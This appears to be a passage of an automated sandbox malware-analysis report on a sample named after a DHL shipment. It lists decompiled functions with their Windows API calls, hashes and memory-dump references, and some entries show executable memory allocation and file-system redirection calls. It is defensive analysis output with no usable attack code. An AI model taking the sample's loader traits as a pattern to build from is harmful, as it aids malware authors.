                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0083F910,00000000,?,?,?,?), ref: 008379DF
                                                                                    • GetWindowLongW.USER32 ref: 008379FC
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00837A0C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: 39ce7a8b959b46fc7298e0961bb3340a903c9588822039fd77cdbf3fc0ce77fe
                                                                                    • Instruction ID: baf87b031296fc28d431e12f20c9084f27105563990f497f114e05b76c14e61f
                                                                                    • Opcode Fuzzy Hash: 39ce7a8b959b46fc7298e0961bb3340a903c9588822039fd77cdbf3fc0ce77fe
                                                                                    • Instruction Fuzzy Hash: 1931E171204206ABDB218E38DC45BEA7BA9FB85334F204725F975E32E1D734ED518B90
                                                                                    Function 008373D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00837461
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00837475
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00837499
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 49b66fdec9c59dde46ae7829b69d6399decdae81550a5d1b07947ec0e9fdc3e1
                                                                                    • Instruction ID: b15b637bf36d5da28e94339cb89dbcfc3d3370d3d5c5a70b34f20bb47a064a4b
                                                                                    • Opcode Fuzzy Hash: 49b66fdec9c59dde46ae7829b69d6399decdae81550a5d1b07947ec0e9fdc3e1
                                                                                    • Instruction Fuzzy Hash: F0218072500218ABDF218E54CC46FEA3B69FB88724F110214FA55AB190DAB5E8919BE0
                                                                                    Function 00837B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00837C4A
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00837C58
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00837C5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: 6c4482489da7e2c85870e2a8952f09ca157d0a3f5f236c7828974c285aeda179
                                                                                    • Instruction ID: 01417578f0f456f796436644ddf502dd0d51040af542a842269cc2a2ea2331f5
                                                                                    • Opcode Fuzzy Hash: 6c4482489da7e2c85870e2a8952f09ca157d0a3f5f236c7828974c285aeda179
                                                                                    • Instruction Fuzzy Hash: E5217CB1604208AFDB20DF28DCC5DA737ACFB9A364B140459FA15DB3A1CB71EC418AA0
                                                                                    Function 00836CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00836D3B
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00836D4B
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00836D70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 277968233b3c7733ed1e35b6b31212d1a9c5d49adbf0a029042783eae38c4f6b
                                                                                    • Instruction ID: 1954315f66c20b07aeeb29c2cded89d26da1dd04b8f5e64d7d65e6a3eecd5d51
                                                                                    • Opcode Fuzzy Hash: 277968233b3c7733ed1e35b6b31212d1a9c5d49adbf0a029042783eae38c4f6b
                                                                                    • Instruction Fuzzy Hash: 9A218032600118BFDF118F58DC45EAB3BAAFFC9764F418128FA459B1A0DA719C6287E0
                                                                                    Function 0083770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00837772
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00837787
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00837794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 3edb880d67dc3ddbc30076887569d3172a3f0495ce7d80957f1c4d92a3ce3c5d
                                                                                    • Instruction ID: 93417b63ab7132dca1790d427deddafbe528be360ac8ce70b7f902e3b6122651
                                                                                    • Opcode Fuzzy Hash: 3edb880d67dc3ddbc30076887569d3172a3f0495ce7d80957f1c4d92a3ce3c5d
                                                                                    • Instruction Fuzzy Hash: 3B1123B2200208BAEF205F64CC05FEB37A8FFC9B64F010628FA41E2190D272E811CB60
                                                                                    Function 007B4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4B83,?), ref: 007B4C44
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4C56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: 677b3c3793f1b0a06d6aea2a4b098a38d8453838ca8110adb77b0a9114558ee7
                                                                                    • Instruction ID: 5ff018bb5918ad77212fd88b12354ff19e5f7e7276e12c2faca4d3a3ee4e7af8
                                                                                    • Opcode Fuzzy Hash: 677b3c3793f1b0a06d6aea2a4b098a38d8453838ca8110adb77b0a9114558ee7
                                                                                    • Instruction Fuzzy Hash: 26D01270910713CFD7205F31D90965A77D4BF45751F118C3A99A6D6262E678D480C6A0
                                                                                    Function 007B4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4BD0,?,007B4DEF,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4C11
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B4C23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: deb655d600360c3f7a64da00979abc24d226adc33927a12e377023cfc1b2c6e9
                                                                                    • Instruction ID: ec2017bce5123e05aede766060a41278e9f4078660307b72ffba6ca5475a4ddf
                                                                                    • Opcode Fuzzy Hash: deb655d600360c3f7a64da00979abc24d226adc33927a12e377023cfc1b2c6e9
                                                                                    • Instruction Fuzzy Hash: BAD0C230900713CFC7205F70D80864BBAD5FF09751F018C3A9492C2262E6B8C480C6A0
                                                                                    Function 00830DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00831039), ref: 00830DF5
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00830E07
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 9bf9f3defeb404c2bd469148566cb0eff7681c710edd7c479056ffea1ff91aeb
                                                                                    • Instruction ID: 4b61e7136a7beb96cf54a0f42e5be5d7b2f91bc675e7887125b364fd9076d0c3
                                                                                    • Opcode Fuzzy Hash: 9bf9f3defeb404c2bd469148566cb0eff7681c710edd7c479056ffea1ff91aeb
                                                                                    • Instruction Fuzzy Hash: F5D08230A00322CFC7218F72D80828A72E9FF80352F028C2ED592C22A0E6B4D8908A80
                                                                                    Function 008290E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00828CF4,?,0083F910), ref: 008290EE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00829100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 74f13984873c1babd0e88769f6662aa7fce3e7ae072ffc653aff9f4924e170ef
                                                                                    • Instruction ID: 947e6f5f3d16a703cd1bc177b5c025c4758bd3b21e1e12e143fc0a0b5f41884a
                                                                                    • Opcode Fuzzy Hash: 74f13984873c1babd0e88769f6662aa7fce3e7ae072ffc653aff9f4924e170ef
                                                                                    • Instruction Fuzzy Hash: 5AD01274950723CFDB209F31E81850676D4FF55351F128C79D9D5D6650EA78C4C0CAD0
                                                                                    Function 007F1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: 69a34de66065504f8cfab66c09d8942c3a20605190ce02049acba1f54512378d
                                                                                    • Instruction ID: 17d46d07c0ead3a5b18f7ff32533ae75e0074c0ae979b65b9b6ffa1af0542816
                                                                                    • Opcode Fuzzy Hash: 69a34de66065504f8cfab66c09d8942c3a20605190ce02049acba1f54512378d
                                                                                    • Instruction Fuzzy Hash: A5D05B71C1410CFAC700A7909C88CF9737CB719311FA00462F60AD2240E23ED754D731
                                                                                    Function 0080717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                                                                                    • Instruction ID: 669954d9531f5b1a18a7b0601893e7350250d4cce4581253142aa8fba86aa11e
                                                                                    • Opcode Fuzzy Hash: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                                                                                    • Instruction Fuzzy Hash: 1CC16D74E0421AEFDB54CFA4C884EAEBBB5FF48704B158598E805EB291D730ED81DB90
                                                                                    Function 0082E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0082E0BE
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0082E101
                                                                                      • Part of subcall function 0082D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082D7C5
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0082E301
                                                                                    • _memmove.LIBCMT ref: 0082E314
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3659485706-0
                                                                                    • Opcode ID: 4fd5c24d5eafbce3e8a315dfab17695faa80cf346dd8653d377c8b2af07f0b4c
                                                                                    • Instruction ID: 15341e064315d2fa074f04cca66ebf328219f60ed513f3937b51d9e8eb730585
                                                                                    • Opcode Fuzzy Hash: 4fd5c24d5eafbce3e8a315dfab17695faa80cf346dd8653d377c8b2af07f0b4c
                                                                                    • Instruction Fuzzy Hash: DCC121716083119FC714DF28C484A6ABBE4FF89314F14896EF99ADB351D730E986CB82
                                                                                    Function 00828093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 008280C3
                                                                                    • CoUninitialize.OLE32 ref: 008280CE
                                                                                      • Part of subcall function 0080D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0080D5D4
                                                                                    • VariantInit.OLEAUT32(?), ref: 008280D9
                                                                                    • VariantClear.OLEAUT32(?), ref: 008283AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: e70744baf4d3b7b73893a4946bc714206db126c8f8e586729f3b72cb9afec688
                                                                                    • Instruction ID: c82228494254c1d41aecb2cf5797b16806b3ffc7e18160e6c5d979330dbaa223
                                                                                    • Opcode Fuzzy Hash: e70744baf4d3b7b73893a4946bc714206db126c8f8e586729f3b72cb9afec688
                                                                                    • Instruction Fuzzy Hash: 5BA11175604711DFCB00DF24D889B6AB7E4FF89314F048418FAA69B3A1CB34E844CB82
                                                                                    Function 00807530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00842C7C,?), ref: 008076EA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00842C7C,?), ref: 00807702
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0083FB80,000000FF,?,00000000,00000800,00000000,?,00842C7C,?), ref: 00807727
                                                                                    • _memcmp.LIBCMT ref: 00807748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: d362d7eaa23df1a88fe1422ae7778ddee53469a1bec89410a8291aac2efbe0c6
                                                                                    • Instruction ID: 505079c91bc8a558bc9077ef8d5823432d63e126ec21814cafea85aae595a69e
                                                                                    • Opcode Fuzzy Hash: d362d7eaa23df1a88fe1422ae7778ddee53469a1bec89410a8291aac2efbe0c6
                                                                                    • Instruction Fuzzy Hash: E781E975A00109EFCB44DFA4C984EEEB7B9FF89315F204558E516EB250DB71AE06CB60
                                                                                    Function 0080687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 0081131ffb234a4995a21736f0b4fa7da1eb0b06172039561c9637d90cf5e74b
                                                                                    • Instruction ID: 8a3ecdbb81710c60452cc7a40c71dc231a106242c6c2da216ef118889ac7663e
                                                                                    • Opcode Fuzzy Hash: 0081131ffb234a4995a21736f0b4fa7da1eb0b06172039561c9637d90cf5e74b
                                                                                    • Instruction Fuzzy Hash: F351BE747003069ADBA0AF69DC95A6AB7E5FF45310F20D81FE696DB2D1EB34D8B08701
                                                                                    Function 008397F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(012309F0,?), ref: 00839863
                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00839896
                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00839903
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
